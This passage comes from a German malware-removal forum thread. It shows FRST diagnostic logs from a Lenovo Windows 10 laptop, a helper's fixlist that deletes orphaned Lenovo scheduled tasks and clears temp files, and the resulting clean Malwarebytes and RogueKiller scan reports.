==================== Alternate Data Streams (Nicht auf der Ausnahmeliste) ========

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird nur der ADS entfernt.)

AlternateDataStreams: C:\Users\Public\Shared Files:VersionCache [488]
AlternateDataStreams: C:\Users\samim\AppData\Local\Temp:$DATA​ [16]

==================== Abgesicherter Modus (Nicht auf der Ausnahmeliste) ==================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Der Wert "AlternateShell" wird wiederhergestellt.)

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MBAMService => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MCODS => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MBAMService => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\McMPFSvc => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MCODS => ""="Service"

==================== Verknüpfungen (Nicht auf der Ausnahmeliste) =================

==================== Internet Explorer (Nicht auf der Ausnahmeliste) ==========

HKU\S-1-5-21-392041295-3890174389-3109141049-1001\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.msn.com/?pc=LCTE
HKU\S-1-5-21-392041295-3890174389-3109141049-1001\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.msn.com/?pc=LCTE
HKU\S-1-5-21-392041295-3890174389-3109141049-1001\Software\Microsoft\Internet Explorer\Main,Secondary Start Pages = hxxp://mystart.lenovo.com/
BHO-x32: Skype for Business Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files\Microsoft Office\root\VFS\ProgramFilesX86\Microsoft Office\Office16\OCHelper.dll [2020-09-15] (Microsoft Corporation -> Microsoft Corporation)
Handler: mso-minsb-roaming.16 - {83C25742-A9F7-49FB-9138-434302C88D07} - C:\Program Files\Microsoft Office\root\Office16\MSOSB.DLL [2020-09-15] (Microsoft Corporation -> Microsoft Corporation)
Handler-x32: mso-minsb-roaming.16 - {83C25742-A9F7-49FB-9138-434302C88D07} - C:\Program Files\Microsoft Office\root\VFS\ProgramFilesX86\Microsoft Office\Office16\MSOSB.DLL [2020-09-15] (Microsoft Corporation -> Microsoft Corporation)
Handler: mso-minsb.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - C:\Program Files\Microsoft Office\root\Office16\MSOSB.DLL [2020-09-15] (Microsoft Corporation -> Microsoft Corporation)
Handler-x32: mso-minsb.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - C:\Program Files\Microsoft Office\root\VFS\ProgramFilesX86\Microsoft Office\Office16\MSOSB.DLL [2020-09-15] (Microsoft Corporation -> Microsoft Corporation)
Handler: osf-roaming.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - C:\Program Files\Microsoft Office\root\Office16\MSOSB.DLL [2020-09-15] (Microsoft Corporation -> Microsoft Corporation)
Handler-x32: osf-roaming.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - C:\Program Files\Microsoft Office\root\VFS\ProgramFilesX86\Microsoft Office\Office16\MSOSB.DLL [2020-09-15] (Microsoft Corporation -> Microsoft Corporation)
Handler: osf.16 - {5504BE45-A83B-4808-900A-3A5C36E7F77A} - C:\Program Files\Microsoft Office\root\Office16\MSOSB.DLL [2020-09-15] (Microsoft Corporation -> Microsoft Corporation)
Handler-x32: osf.16 - {5504BE45-A83B-4808-900A-3A5C36E7F77A} - C:\Program Files\Microsoft Office\root\VFS\ProgramFilesX86\Microsoft Office\Office16\MSOSB.DLL [2020-09-15] (Microsoft Corporation -> Microsoft Corporation)

==================== Hosts Inhalt: =========================

(Wenn benötigt kann der Hosts: Schalter in die Fixlist aufgenommen werden um die Hosts Datei zurückzusetzen.)

2019-03-19 06:49 - 2019-03-19 06:49 - 000000824 _____ C:\Windows\system32\drivers\etc\hosts

==================== Andere Bereiche ===========================

(Aktuell gibt es keinen automatisierten Fix für diesen Bereich.)

HKU\S-1-5-21-392041295-3890174389-3109141049-1001\Control Panel\Desktop\\Wallpaper -> C:\Users\samim\Downloads\3t88melm5eb01.jpg
DNS Servers: 192.168.178.1
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer => (SmartScreenEnabled: )
 ist aktiviert.

Network Binding:
=============
WLAN: VirtualBox NDIS6 Bridged Networking Driver -> oracle_VBoxNetLwf (enabled)
Ethernet: VirtualBox NDIS6 Bridged Networking Driver -> oracle_VBoxNetLwf (enabled)
VirtualBox Host-Only Network: VirtualBox NDIS6 Bridged Networking Driver -> oracle_VBoxNetLwf (enabled)
Ethernet 3: VirtualBox NDIS6 Bridged Networking Driver -> oracle_VBoxNetLwf (enabled)

==================== MSCONFIG/TASK MANAGER Deaktivierte Einträge ==

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er entfernt.)

HKLM\...\StartupApproved\Run32: => "Avira SystrayStartTrigger"
HKU\S-1-5-21-392041295-3890174389-3109141049-1001\...\StartupApproved\StartupFolder: => "Twitch.lnk"
HKU\S-1-5-21-392041295-3890174389-3109141049-1001\...\StartupApproved\Run: => "Spotify"
HKU\S-1-5-21-392041295-3890174389-3109141049-1001\...\StartupApproved\Run: => "Opera Browser Assistant"
HKU\S-1-5-21-392041295-3890174389-3109141049-1001\...\StartupApproved\Run: => "Windscribe"

==================== Firewall Regeln (Nicht auf der Ausnahmeliste) ================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

FirewallRules: [TCP Query User{9C279AEF-C3EE-4CA8-A626-4EDC70B6CE46}C:\program files\lenovo\lenovo migration assistant\lenovo migration assistant srv.exe] => (Allow) C:\program files\lenovo\lenovo migration assistant\lenovo migration assistant srv.exe (Lenovo -> )
FirewallRules: [UDP Query User{9020EA73-7AE2-4662-95FF-ABA284B0D1E7}C:\program files\lenovo\lenovo migration assistant\lenovo migration assistant srv.exe] => (Allow) C:\program files\lenovo\lenovo migration assistant\lenovo migration assistant srv.exe (Lenovo -> )
FirewallRules: [TCP Query User{9FACBDB3-AD12-4364-8137-C55468F1E800}C:\program files (x86)\samsung\easy printer manager\easyprintermanagerv2.exe] => (Allow) C:\program files (x86)\samsung\easy printer manager\easyprintermanagerv2.exe (HP Inc. -> )
FirewallRules: [UDP Query User{C87EAB22-0F9E-4537-BF37-1ED465AA82CD}C:\program files (x86)\samsung\easy printer manager\easyprintermanagerv2.exe] => (Allow) C:\program files (x86)\samsung\easy printer manager\easyprintermanagerv2.exe (HP Inc. -> )
FirewallRules: [{F7B5156F-84D0-4E75-B53D-D145CC6EB565}] => (Allow) C:\Program Files (x86)\Steam\steam.exe (Valve -> Valve Corporation)
FirewallRules: [{F0F8B6BF-F125-47C2-B707-C84239424777}] => (Allow) C:\Program Files (x86)\Steam\steam.exe (Valve -> Valve Corporation)
FirewallRules: [{593F24CF-76C9-4DD4-AE49-487DB4480A15}] => (Allow) C:\Program Files (x86)\Steam\bin\cef\cef.win7x64\steamwebhelper.exe (Valve -> Valve Corporation)
FirewallRules: [{8E579E24-EDB3-415C-A81D-788F6EEBACC6}] => (Allow) C:\Program Files (x86)\Steam\bin\cef\cef.win7x64\steamwebhelper.exe (Valve -> Valve Corporation)
FirewallRules: [{F2529F67-6BCA-4076-87ED-474D4D51E4F0}] => (Allow) D:\Games\Steam Games\steamapps\common\Counter-Strike Global Offensive\csgo.exe (Valve -> )
FirewallRules: [{08AFA0A1-C22D-4127-9653-A96EAFD052D0}] => (Allow) D:\Games\Steam Games\steamapps\common\Counter-Strike Global Offensive\csgo.exe (Valve -> )
FirewallRules: [{E884DD24-A0D0-4730-9D87-5C0A944B6DBF}] => (Allow) D:\Games\Steam Games\steamapps\common\VRChat\VRChat.exe () [Datei ist nicht signiert]
FirewallRules: [{1972FE11-3E81-463A-B346-C4680B3C0BE2}] => (Allow) D:\Games\Steam Games\steamapps\common\VRChat\VRChat.exe () [Datei ist nicht signiert]
FirewallRules: [{0066A50F-20E7-4E9F-996D-889A349F1F46}] => (Allow) D:\Games\Steam Games\steamapps\common\Bomb Bots Arena\Bomb Bots Arena.exe () [Datei ist nicht signiert]
FirewallRules: [{F6832975-7F52-4D94-88C1-688DBB86B363}] => (Allow) D:\Games\Steam Games\steamapps\common\Bomb Bots Arena\Bomb Bots Arena.exe () [Datei ist nicht signiert]

==================== Wiederherstellungspunkte =========================

ACHTUNG: Systemwiederherstellung ist deaktiviert (Total:118 GB) (Free:26.83 GB) (23%)

==================== Fehlerhafte Geräte im Gerätemanager ============


==================== Fehlereinträge in der Ereignisanzeige: ========================

Applikationsfehler:
==================
Error: (10/06/2020 11:02:55 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Name der fehlerhaften Anwendung: DllHost.exe, Version: 10.0.18362.1, Zeitstempel: 0x4250d5de
Name des fehlerhaften Moduls: combase.dll, Version: 10.0.18362.1082, Zeitstempel: 0x759ad69d
Ausnahmecode: 0xc0000005
Fehleroffset: 0x000db32d
ID des fehlerhaften Prozesses: 0x42f0
Startzeit der fehlerhaften Anwendung: 0x01d69bbb8db1bf14
Pfad der fehlerhaften Anwendung: C:\Windows\SysWOW64\DllHost.exe
Pfad des fehlerhaften Moduls: C:\Windows\System32\combase.dll
Berichtskennung: 2b1d9c24-9a98-4203-b4cc-95b8f05734e7
Vollständiger Name des fehlerhaften Pakets: Microsoft.SkypeApp_15.64.80.0_x86__kzf8qxf38zg5c
Anwendungs-ID, die relativ zum fehlerhaften Paket ist: App

Error: (10/06/2020 02:10:22 AM) (Source: VSS) (EventID: 13) (User: )
Description: Volumenschattenkopie-Dienst-Informationen: Der COM-Server mit CLSID {4e14fba2-2e22-11d1-9964-00c04fbbb345} und dem Namen "CEventSystem" kann nicht gestartet werden. [0x8007045b, Der Computer wird heruntergefahren.
]

Error: (10/05/2020 11:08:55 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Name der fehlerhaften Anwendung: mbamtray.exe, Version: 4.0.0.794, Zeitstempel: 0x5f52571b
Name des fehlerhaften Moduls: Qt5Core.dll, Version: 5.14.1.0, Zeitstempel: 0x5e8272e4
Ausnahmecode: 0xc0000005
Fehleroffset: 0x0000000000219d05
ID des fehlerhaften Prozesses: 0x1d90
Startzeit der fehlerhaften Anwendung: 0x01d69b5b9868350d
Pfad der fehlerhaften Anwendung: C:\Program Files\Malwarebytes\Anti-Malware\mbamtray.exe
Pfad des fehlerhaften Moduls: C:\Program Files\Malwarebytes\Anti-Malware\Qt5Core.dll
Berichtskennung: 93ed049a-9c7f-4851-b744-702610cff7e7
Vollständiger Name des fehlerhaften Pakets:
Anwendungs-ID, die relativ zum fehlerhaften Paket ist:

Error: (10/05/2020 05:57:58 PM) (Source: VSS) (EventID: 8193) (User: )
Description: Volumeschattenkopie-Dienstfehler: Beim Aufrufen von Routine "CoCreateInstance" ist ein unerwarteter Fehler aufgetreten. hr = 0x8007045b, Der Computer wird heruntergefahren.
.

Error: (10/05/2020 05:57:58 PM) (Source: VSS) (EventID: 13) (User: )
Description: Volumenschattenkopie-Dienst-Informationen: Der COM-Server mit CLSID {4e14fba2-2e22-11d1-9964-00c04fbbb345} und dem Namen "CEventSystem" kann nicht gestartet werden. [0x8007045b, Der Computer wird heruntergefahren.
]

Error: (10/05/2020 03:54:08 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Name der fehlerhaften Anwendung: mbamtray.exe, Version: 4.0.0.794, Zeitstempel: 0x5f52571b
Name des fehlerhaften Moduls: Qt5Core.dll, Version: 5.14.1.0, Zeitstempel: 0x5e8272e4
Ausnahmecode: 0xc0000005
Fehleroffset: 0x0000000000219d05
ID des fehlerhaften Prozesses: 0x2d64
Startzeit der fehlerhaften Anwendung: 0x01d69b1ed9c1448c
Pfad der fehlerhaften Anwendung: C:\Program Files\Malwarebytes\Anti-Malware\mbamtray.exe
Pfad des fehlerhaften Moduls: C:\Program Files\Malwarebytes\Anti-Malware\Qt5Core.dll
Berichtskennung: c8da225f-acb2-434b-af52-53628ee051eb
Vollständiger Name des fehlerhaften Pakets:
Anwendungs-ID, die relativ zum fehlerhaften Paket ist:

Error: (10/03/2020 09:11:18 PM) (Source: System Restore) (EventID: 8193) (User: )
Description: Fehler beim Erstellen des Wiederherstellungspunkts (Prozess = msiexec.exe; Beschreibung = CIS Installer; Fehler = System Restore service is disabled.).

Error: (10/03/2020 09:07:23 PM) (Source: VSS) (EventID: 8193) (User: )
Description: Volumeschattenkopie-Dienstfehler: Beim Aufrufen von Routine "CoCreateInstance" ist ein unerwarteter Fehler aufgetreten. hr = 0x8007045b, Der Computer wird heruntergefahren.
.


Systemfehler:
=============
Error: (10/06/2020 11:02:03 AM) (Source: VBoxNetLwf) (EventID: 12) (User: )
Description: Der Treiber hat einen internen Treiberfehler auf \Device\VBoxNetLwf gefunden.

Error: (10/06/2020 10:49:07 AM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: Der Dienst "System Interface Foundation Service" wurde aufgrund folgenden Fehlers nicht gestartet:
Das System kann die angegebene Datei nicht finden.

Error: (10/06/2020 10:35:44 AM) (Source: DCOM) (EventID: 10010) (User: SAMIMMASCHALSLA)
Description: Der Server "Microsoft.SkypeApp_15.64.80.0_x86__kzf8qxf38zg5c!App.AppXtwmqn4em5r5dpafgj4t4yyxgjfe0hr50.mca" konnte innerhalb des angegebenen Zeitabschnitts mit DCOM nicht registriert werden.

Error: (10/06/2020 10:35:07 AM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: Der Dienst "System Interface Foundation Service" wurde aufgrund folgenden Fehlers nicht gestartet:
Das System kann die angegebene Datei nicht finden.

Error: (10/06/2020 10:34:37 AM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: Der Dienst "System Interface Foundation Service" wurde aufgrund folgenden Fehlers nicht gestartet:
Das System kann die angegebene Datei nicht finden.

Error: (10/06/2020 10:34:17 AM) (Source: DCOM) (EventID: 10010) (User: SAMIMMASCHALSLA)
Description: Der Server "Microsoft.SkypeApp_15.64.80.0_x86__kzf8qxf38zg5c!App.AppXtwmqn4em5r5dpafgj4t4yyxgjfe0hr50.mca" konnte innerhalb des angegebenen Zeitabschnitts mit DCOM nicht registriert werden.

Error: (10/06/2020 10:34:07 AM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: Der Dienst "System Interface Foundation Service" wurde aufgrund folgenden Fehlers nicht gestartet:
Das System kann die angegebene Datei nicht finden.

Error: (10/06/2020 10:34:03 AM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: Der Dienst "WsDrvInst" wurde aufgrund folgenden Fehlers nicht gestartet:
Das System kann die angegebene Datei nicht finden.


Windows Defender:
===================================
Date: 2020-10-05 17:57:54.832
Description:
Bei Windows Defender Antivirus ist ein Fehler beim Laden der Sicherheitsinformationen aufgetreten. Es wird versucht, zu einer als fehlerfrei bekannten Version zurückzukehren.
Sicherheitsversion versucht: Aktuell
Fehlercode: 0x80070002
Fehlerbeschreibung: Das System kann die angegebene Datei nicht finden.
tSicherheitsversion: 0.0.0.0;0.0.0.0
Modulversion: 0.0.0.0

CodeIntegrity:
===================================

Date: 2020-10-03 21:11:46.329
Description:
Code Integrity determined that a process (\Device\HarddiskVolume5\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume5\Program Files\COMODO\COMODO Internet Security\AmsiProvider_x64.dll that did not meet the Windows signing level requirements.

Date: 2020-10-03 21:11:46.325
Description:
Code Integrity determined that a process (\Device\HarddiskVolume5\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume5\Program Files\COMODO\COMODO Internet Security\AmsiProvider_x64.dll that did not meet the Windows signing level requirements.

Date: 2020-10-03 21:11:46.310
Description:
Code Integrity determined that a process (\Device\HarddiskVolume5\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume5\Program Files\COMODO\COMODO Internet Security\AmsiProvider_x64.dll that did not meet the Windows signing level requirements.

Date: 2020-10-03 21:10:59.226
Description:
Code Integrity determined that a process (\Device\HarddiskVolume5\Program Files\Windows Defender\MpCmdRun.exe) attempted to load \Device\HarddiskVolume5\Program Files\COMODO\COMODO Internet Security\AmsiProvider_x64.dll that did not meet the Microsoft signing level requirements.

Date: 2020-10-03 21:10:59.222
Description:
Code Integrity determined that a process (\Device\HarddiskVolume5\Program Files\Windows Defender\MpCmdRun.exe) attempted to load \Device\HarddiskVolume5\Program Files\COMODO\COMODO Internet Security\AmsiProvider_x64.dll that did not meet the Microsoft signing level requirements.

Date: 2020-10-03 21:10:59.218
Description:
Code Integrity determined that a process (\Device\HarddiskVolume5\Program Files\Windows Defender\MpCmdRun.exe) attempted to load \Device\HarddiskVolume5\Program Files\COMODO\COMODO Internet Security\AmsiProvider_x64.dll that did not meet the Microsoft signing level requirements.

Date: 2020-10-03 21:10:59.214
Description:
Code Integrity determined that a process (\Device\HarddiskVolume5\Program Files\Windows Defender\MpCmdRun.exe) attempted to load \Device\HarddiskVolume5\Program Files\COMODO\COMODO Internet Security\AmsiProvider_x64.dll that did not meet the Microsoft signing level requirements.

Date: 2020-10-03 21:10:59.210
Description:
Code Integrity determined that a process (\Device\HarddiskVolume5\Program Files\Windows Defender\MpCmdRun.exe) attempted to load \Device\HarddiskVolume5\Program Files\COMODO\COMODO Internet Security\AmsiProvider_x64.dll that did not meet the Microsoft signing level requirements.

==================== Speicherinformationen ===========================

BIOS: LENOVO BGCN31WW 06/23/2020
Hauptplatine: LENOVO LNVNB161216
Prozessor: Intel(R) Core(TM) i7-9750HF CPU @ 2.60GHz
Prozentuale Nutzung des RAM: 39%
Installierter physikalischer RAM: 16304.24 MB
Verfügbarer physikalischer RAM: 9856.94 MB
Summe virtueller Speicher: 18736.24 MB
Verfügbarer virtueller Speicher: 10431.93 MB

==================== Laufwerke ================================

Drive c: (Windows-SSD) (Fixed) (Total:118 GB) (Free:26.83 GB) NTFS
Drive d: (Data) (Fixed) (Total:931.5 GB) (Free:604.25 GB) NTFS

\\?\Volume{d43f81ac-3f9a-47e3-b632-02b4dbd1dd9b}\ (WINRE_DRV) (Fixed) (Total:0.98 GB) (Free:0.48 GB) NTFS
\\?\Volume{c30d177d-ec26-4c7b-bb4e-e67e35c429a7}\ (SYSTEM_DRV) (Fixed) (Total:0.25 GB) (Free:0.22 GB) FAT32

==================== MBR & Partitionstabelle ====================

==========================================================
Disk: 0 (Size: 119.2 GB) (Disk ID: F63E37D8)

Partition: GPT.

==========================================================
Disk: 1 (Size: 931.5 GB) (Disk ID: C245BBE0)

Partition: GPT.

==================== Ende von Addition.txt =======================


cosinus 06.10.2020 10:22

  • Kopiere den gesamten Inhalt der folgenden Code-Box:
    Code:

    Start::
    Task: {077D311A-EBCB-43F1-B075-C3FEEAF52697} - \Lenovo\ImController\TimeBasedEvents\c2661e91-8e4a-4cc5-8637-e0a13f0f51f0 -> Keine Datei <==== ACHTUNG
    Task: {0DB883A5-DCDB-4E1D-B808-D142CD5F7DC5} - \Lenovo\ImController\Lenovo iM Controller Monitor -> Keine Datei <==== ACHTUNG
    Task: {3E8F7F64-9D1D-4916-8160-644705AF551C} - \Lenovo\ImController\Plugins\LenovoSystemUpdatePlugin_WeeklyTask -> Keine Datei <==== ACHTUNG
    Task: {7486D7C7-7537-4D6C-8E8F-B13A8E85C467} - \Lenovo\ImController\TimeBasedEvents\0ee5ade8-528b-4dce-a5b7-d2e61a5e734b -> Keine Datei <==== ACHTUNG
    Task: {AF168B05-F58A-449E-9D00-A4B0B1C669AE} - \Lenovo\ImController\Lenovo iM Controller Scheduled Maintenance -> Keine Datei <==== ACHTUNG
    Task: {B133AF60-171F-4DDD-B088-7BD7F910A8FA} - \Lenovo\ImController\TimeBasedEvents\486e63ef-659a-44df-8e1c-7533e51f03f6 -> Keine Datei <==== ACHTUNG
    Task: {CAD74088-C270-4958-A385-93278CC0B93A} - \Lenovo\ImController\TimeBasedEvents\f581897e-e444-4b3b-8ca7-edee75465123 -> Keine Datei <==== ACHTUNG
    emptytemp:
    End::

  • Starte nun FRST und klicke direkt den Reparieren Button.Wichtig: Du brauchst den Inhalt der Code-Box nirgends einfügen, da sich FRST den Code aus der Zwischenablage holt!
  • Das Tool führt die gewünschten Schritte aus und erstellt eine fixlog.txt im selben Verzeichnis, in dem sich FRST befindet.
  • Gegebenenfalls muss dein Rechner neu gestartet werden.
  • Poste mir den Inhalt der fixlog.txt mit deiner nächsten Antwort.

Samoxx 06.10.2020 10:38

Der Inhalt des fixlogs:
Code:

Entfernungsergebnis von Farbar Recovery Scan Tool (x64) Version: 04-10-2020
durchgeführt von samim (06-10-2020 11:34:03) Run:3
Gestartet von C:\Users\samim\Downloads
Geladene Profile: samim
Start-Modus: Normal
==============================================

fixlist Inhalt:
*****************
Task: {077D311A-EBCB-43F1-B075-C3FEEAF52697} - \Lenovo\ImController\TimeBasedEvents\c2661e91-8e4a-4cc5-8637-e0a13f0f51f0 -> Keine Datei <==== ACHTUNG
Task: {0DB883A5-DCDB-4E1D-B808-D142CD5F7DC5} - \Lenovo\ImController\Lenovo iM Controller Monitor -> Keine Datei <==== ACHTUNG
Task: {3E8F7F64-9D1D-4916-8160-644705AF551C} - \Lenovo\ImController\Plugins\LenovoSystemUpdatePlugin_WeeklyTask -> Keine Datei <==== ACHTUNG
Task: {7486D7C7-7537-4D6C-8E8F-B13A8E85C467} - \Lenovo\ImController\TimeBasedEvents\0ee5ade8-528b-4dce-a5b7-d2e61a5e734b -> Keine Datei <==== ACHTUNG
Task: {AF168B05-F58A-449E-9D00-A4B0B1C669AE} - \Lenovo\ImController\Lenovo iM Controller Scheduled Maintenance -> Keine Datei <==== ACHTUNG
Task: {B133AF60-171F-4DDD-B088-7BD7F910A8FA} - \Lenovo\ImController\TimeBasedEvents\486e63ef-659a-44df-8e1c-7533e51f03f6 -> Keine Datei <==== ACHTUNG
Task: {CAD74088-C270-4958-A385-93278CC0B93A} - \Lenovo\ImController\TimeBasedEvents\f581897e-e444-4b3b-8ca7-edee75465123 -> Keine Datei <==== ACHTUNG
emptytemp:

*****************

"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{077D311A-EBCB-43F1-B075-C3FEEAF52697}" => erfolgreich entfernt
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{077D311A-EBCB-43F1-B075-C3FEEAF52697}" => erfolgreich entfernt
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Lenovo\ImController\TimeBasedEvents\c2661e91-8e4a-4cc5-8637-e0a13f0f51f0" => erfolgreich entfernt
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{0DB883A5-DCDB-4E1D-B808-D142CD5F7DC5}" => erfolgreich entfernt
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{0DB883A5-DCDB-4E1D-B808-D142CD5F7DC5}" => erfolgreich entfernt
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Lenovo\ImController\Lenovo iM Controller Monitor" => erfolgreich entfernt
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{3E8F7F64-9D1D-4916-8160-644705AF551C}" => erfolgreich entfernt
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{3E8F7F64-9D1D-4916-8160-644705AF551C}" => erfolgreich entfernt
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Lenovo\ImController\Plugins\LenovoSystemUpdatePlugin_WeeklyTask" => erfolgreich entfernt
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{7486D7C7-7537-4D6C-8E8F-B13A8E85C467}" => erfolgreich entfernt
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{7486D7C7-7537-4D6C-8E8F-B13A8E85C467}" => erfolgreich entfernt
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Lenovo\ImController\TimeBasedEvents\0ee5ade8-528b-4dce-a5b7-d2e61a5e734b" => erfolgreich entfernt
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{AF168B05-F58A-449E-9D00-A4B0B1C669AE}" => erfolgreich entfernt
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{AF168B05-F58A-449E-9D00-A4B0B1C669AE}" => erfolgreich entfernt
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Lenovo\ImController\Lenovo iM Controller Scheduled Maintenance" => erfolgreich entfernt
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{B133AF60-171F-4DDD-B088-7BD7F910A8FA}" => erfolgreich entfernt
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{B133AF60-171F-4DDD-B088-7BD7F910A8FA}" => erfolgreich entfernt
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Lenovo\ImController\TimeBasedEvents\486e63ef-659a-44df-8e1c-7533e51f03f6" => erfolgreich entfernt
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{CAD74088-C270-4958-A385-93278CC0B93A}" => erfolgreich entfernt
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{CAD74088-C270-4958-A385-93278CC0B93A}" => erfolgreich entfernt
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Lenovo\ImController\TimeBasedEvents\f581897e-e444-4b3b-8ca7-edee75465123" => erfolgreich entfernt

=========== EmptyTemp: ==========

BITS transfer queue => 10772480 B
DOMStore, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 19151709 B
Java, Flash, Steam htmlcache => 15668440 B
Windows/system/drivers => 1217578 B
Edge => 0 B
Chrome => 0 B
Firefox => 248650567 B
Opera => 0 B

Temp, IE cache, history, cookies, recent:
Default => 0 B
Users => 0 B
ProgramData => 0 B
Public => 0 B
systemprofile => 0 B
systemprofile32 => 0 B
LocalService => 38958 B
NetworkService => 38958 B
samim => 1745189216 B

RecycleBin => 0 B
EmptyTemp: => 1.9 GB temporäre Dateien entfernt.

================================


Das System musste neu gestartet werden.

==== Ende von Fixlog 11:35:04 ====


cosinus 06.10.2020 11:16

Kontrollscans mit Malwarebytes + RogueKiller bitte.

Samoxx 06.10.2020 11:43

Malwarebytes Bericht:
Code:

Malwarebytes
www.malwarebytes.com

-Protokolldetails-
Scan-Datum: 06.10.20
Scan-Zeit: 12:20
Protokolldatei: 8fcae450-07bd-11eb-b18f-f875a4e2c190.json

-Softwaredaten-
Version: 4.2.1.89
Komponentenversion: 1.0.1045
Version des Aktualisierungspakets: 1.0.30882
Lizenz: Testversion

-Systemdaten-
Betriebssystem: Windows 10 (Build 18362.1082)
CPU: x64
Dateisystem: NTFS
Benutzer: SAMIMMASCHALSLA\samim

-Scan-Übersicht-
Scan-Typ: Bedrohungs-Scan
Scan gestartet von: Manuell
Ergebnis: Abgeschlossen
Gescannte Objekte: 313300
Erkannte Bedrohungen: 0
In die Quarantäne verschobene Bedrohungen: 0
Abgelaufene Zeit: 3 Min., 42 Sek.

-Scan-Optionen-
Speicher: Aktiviert
Start: Aktiviert
Dateisystem: Aktiviert
Archive: Aktiviert
Rootkits: Deaktiviert
Heuristik: Aktiviert
PUP: Erkennung
PUM: Erkennung

-Scan-Details-
Prozess: 0
(keine bösartigen Elemente erkannt)

Modul: 0
(keine bösartigen Elemente erkannt)

Registrierungsschlüssel: 0
(keine bösartigen Elemente erkannt)

Registrierungswert: 0
(keine bösartigen Elemente erkannt)

Registrierungsdaten: 0
(keine bösartigen Elemente erkannt)

Daten-Stream: 0
(keine bösartigen Elemente erkannt)

Ordner: 0
(keine bösartigen Elemente erkannt)

Datei: 0
(keine bösartigen Elemente erkannt)

Physischer Sektor: 0
(keine bösartigen Elemente erkannt)

WMI: 0
(keine bösartigen Elemente erkannt)


(end)

Roguekiller Bericht:
Code:

RogueKiller Anti-Malware V14.7.3.0 (x64) [Sep 15 2020] (Free) von Adlice Software
Mail : https://adlice.com/contact/
Website : https://adlice.com/download/roguekiller/
Betriebssystem : Windows 10 (10.0.18363) 64 bits
Gestartet in : Normaler Modus
Benutzer : samim [Administrator]
Gestartet von : C:\Program Files\RogueKiller\RogueKiller64.exe
Signaturen : 20201005_114100, Treiber : Geladen
Modus : Standard-Scan, Scannen -- Datum : 2020/10/06 12:26:15 (Dauer : 00:05:17)
Switches : -minimize

¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤ Prozesse ¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤

¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤ Prozessmodule ¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤

¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤ Dienste ¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤

